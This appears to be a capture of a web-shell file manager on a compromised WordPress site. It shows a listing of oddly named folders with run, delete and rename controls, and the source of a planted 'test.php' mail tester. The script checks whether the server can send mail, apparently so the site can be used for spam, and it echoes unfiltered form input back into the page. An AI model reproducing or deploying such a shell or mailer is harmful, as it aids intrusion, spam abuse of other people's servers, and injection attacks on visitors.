at path:
ROOT
/
test.php
run:
R
W
Run
3e7c59
DIR
2026-04-08 09:16:05
R
W
Run
62996
DIR
2026-04-08 09:16:10
R
W
Run
wp-content
DIR
2026-04-08 09:16:05
R
W
Run
wp-includes
DIR
2026-04-08 09:16:07
R
W
Run
.htaccess
1.13 KB
2026-04-16 10:20:05
R
W
Run
error_log
367 By
2026-04-15 06:52:06
R
W
Run
Delete
Rename
robots.txt
355 By
2024-08-15 09:16:05
R
W
Run
test.php
737 By
2026-04-01 00:13:26
R
W
Run
Delete
Rename
error_log
up
📄
test.php
Save
<?php error_reporting(0); echo '<b>Email Tester [Sending test].<b><br><br><form method="post"> <input type="text" placeholder="email" name="email" value="'.$_POST['email'].'"> <input type="text" placeholder="ID" name="orderid" value="'.$_POST['orderid'].'"> <input type="submit" value="Send"> </form> <br>'; if (!empty($_POST['email'])) { if (!empty($_POST['email']) && trim($_POST['orderid']) != '') { $rand = trim($_POST['orderid']); } else { $rand = rand(); } mail(trim($_POST['email']),$_SERVER['HTTP_HOST']." - Sending is Working Fine. [Result] ID: (".$rand.")"," [Sending test]."); echo '<b>Send an report to ['.$_POST['email'].'] - ID: '.$rand.'</b>'; echo '<!-- <id>'.$rand.'</id> -->'; } ?>